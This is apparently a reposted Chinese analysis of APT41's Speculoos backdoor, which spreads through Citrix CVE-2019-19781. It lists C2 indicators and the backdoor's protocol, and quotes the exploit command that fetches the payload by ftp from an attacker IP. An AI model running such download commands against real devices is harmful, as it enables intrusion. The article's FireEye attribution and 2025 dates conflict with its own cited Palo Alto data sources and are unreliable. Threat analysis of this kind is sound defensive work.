FireEye在2025年3月25日发布了一份关于APT41全球攻击活动的报告。此攻击活动发生在1月20日至3月11日期间，主要对Citrix，Cisco和Zoho网络设备进行攻击。研究人员根据WildFire和AutoFocus数据获得了针对Citrix设备的攻击样本‘Speculoos’，还确定了北美，南美和欧洲等世界各地多个行业的受害者。

Speculoos的基于FreeBSD实现的，共识别出五个样本，所有样本文件大小基本相同，样本集之间存在微小差异。Speculoos利用CVE-2019-19781进行攻击传播，CVE-2019-19781影响Citrix Application Delivery Controller，Citrix Gateway和Citrix SD-WAN WANOP等设备，允许攻击者远程执行任意命令。

攻击细节

攻击者利用CVE-2019-19781远程执行命令：'/usr/bin/ftp -o /tmp/bsd ftp://test：[redacted]\@ 66.42.98[.]220/'。

第一波攻击始于2025年1月31日晚上，使用的文件名为bsd，影响了美国的多个高等教育机构，美国医疗机构和爱尔兰咨询公司。第二波攻击始于2025年2月24日，使用文件名为un，影响了哥伦比亚高等教育机构，奥地利制造组织，美国高等教育机构以及美国的州政府。

基于BSD系统的恶意软件相对少见，此工具和特定Citrix网络设备有关，因此Speculoos很可能是APT41组织专为此攻击活动研发的。

二进制分析

在FreeBSD系统上可以运行使用GCC 4.2.1编译的ELF可执行文件Speculoos后门。 该负载无法保持持对目标持久控制，因此攻击者会使用额外的组件或其他攻击手段维持控制。执行后门后，会进入循环，该循环通过443端口与C2域通信，并调用函数

alibaba.zzux[.]com (119.28.139[.]120)

当通信出现问题时，Speculoos会通过443端口尝试连接到备用C2服务器，其IP地址为119.28.139[.]20。如果连接到任一C2服务器，它将与服务器进行TLS握手。 图1显示了发送到C2服务器的数据包。

它请求login.live [.] com作为Server Name Indication（SNI）。

成功连接到C2并完成TLS握手后，Speculoos将对目标系统进行指纹识别，并将数据发送回C2服务器。其结构如下表1所示。

数据通过TLS通道发送，并且Speculoos会等待服务器的两字节响应。在收到回应后，它会发送一个字节（0xa）到C2，并进入循环以等待命令。 表2为攻击者可执行命令， 可让攻击者完全控制受害者系统。

研究中分析的两个Speculoos样本在功能上相同，两者之间只有八个字节不同，在收集系统信息时‘hostname‘和‘uname -s’命令不同导致。uname -s返回内核信息，hostname返回主机系统名称。 下图显示了两个Speculoos样本之间的二进制比较。

影响评估

互联网可访问设备允许未经授权的用户远程执行代会带来很大的安全问题，CVE-2019-19781影响了多个面向互联网的设备，攻击者积极利用此漏洞来安装自定义后门。攻击者可以监视或修改整个组织的网络活动，因为所有受影响的组织的网络活动都必须通过这些网络设备进行。

默认情况下通过这些设备可以直接访问组织系统内部，攻击者无需考虑内部网络横向移动的问题。网络攻击者有几种手段攻击，例如改变网络数据、注入恶意代码、实施中间人攻击或将用户引诱到虚假登录页面以窃取登录信息。

# 美国  # 多个  # 互联网  # 教育机构  # 连接到  # 哥伦比亚  # 奥地利  # 爱尔兰  # 南美  # 北美 

相关栏目： 【 网站优化151355 】 【 网络推广146373 】 【 网络技术251813 】 【 AI营销90571 】

相关推荐： 如何在新浪SAE免费搭建个人博客？  Android自定义控件实现温度旋转按钮效果  Laravel中DTO是什么概念_在Laravel项目中使用数据传输对象(DTO)  浅谈javascript alert和confirm的美化  Laravel如何处理文件上传_Laravel Storage门面实现文件存储与管理  中山网站推广排名,中山信息港登录入口？  中山网站制作网页,中山新生登记系统登记流程？  如何在云主机上快速搭建多站点网站？  Laravel如何实现API版本控制_Laravel版本化API设计方案  laravel怎么配置和使用PHP-FPM来优化性能_laravel PHP-FPM配置与性能优化方法  Laravel如何升级到最新版本？（升级指南和步骤）  Laravel如何生成PDF或Excel文件_Laravel文档导出工具与使用教程  简单实现Android文件上传  Java Adapter 适配器模式（类适配器，对象适配器）优缺点对比  网站制作价目表怎么做,珍爱网婚介费用多少？  Android滚轮选择时间控件使用详解  香港服务器网站测试全流程：性能评估、SEO加载与移动适配优化  电商网站制作多少钱一个,电子商务公司的网站制作费用计入什么科目？  Laravel如何使用API Resources格式化JSON响应_Laravel数据资源封装与格式化输出  Laravel如何集成微信支付SDK_Laravel使用yansongda-pay实现扫码支付【实战】  Linux网络带宽限制_tc配置实践解析【教程】  矢量图网站制作软件,用千图网的一张矢量图做公司app首页，该网站并未说明版权等问题，这样做算不算侵权？应该如何解决？  齐河建站公司：营销型网站建设与SEO优化双核驱动策略  如何批量查询域名的建站时间记录？  如何生成腾讯云建站专用兑换码？  Midjourney怎样加参数调细节_Midjourney参数调整技巧【指南】  Laravel怎么使用Blade模板引擎_Laravel模板继承与Component组件复用【手册】  JavaScript如何实现错误处理_try...catch如何捕获异常？  如何在Windows环境下新建FTP站点并设置权限？  如何在万网自助建站平台快速创建网站？  个人网站制作流程图片大全,个人网站如何注销？  Laravel如何自定义分页视图？（Pagination示例）  网站制作大概要多少钱一个,做一个平台网站大概多少钱？  Laravel怎么连接多个数据库_Laravel多数据库连接配置  高端建站三要素：定制模板、企业官网与响应式设计优化  小米17系列还有一款新机？主打6.9英寸大直屏和旗舰级影像  邀请函制作网站有哪些,有没有做年会邀请函的网站啊？在线制作，模板很多的那种？  如何在万网自助建站中设置域名及备案？  uc浏览器二维码扫描入口_uc浏览器扫码功能使用地址  宙斯浏览器文件分类查看教程 快速筛选视频文档与图片方法  Laravel怎么实现搜索高亮功能_Laravel结合Scout与Algolia全文检索【实战】  JS弹性运动实现方法分析  如何在IIS中新建站点并配置端口与IP地址？  Laravel如何使用Blade模板引擎？（完整语法和示例）  高性能网站服务器配置指南：安全稳定与高效建站核心方案  Laravel如何实现多语言支持_Laravel本地化与国际化(i18n)配置教程  Laravel怎么生成二维码图片_Laravel集成Simple-QrCode扩展包与参数设置【实战】  HTML5空格和nbsp有啥关系_nbsp的作用及使用场景【说明】  什么是JavaScript解构赋值_解构赋值有哪些实用技巧  七夕网站制作视频,七夕大促活动怎么报名？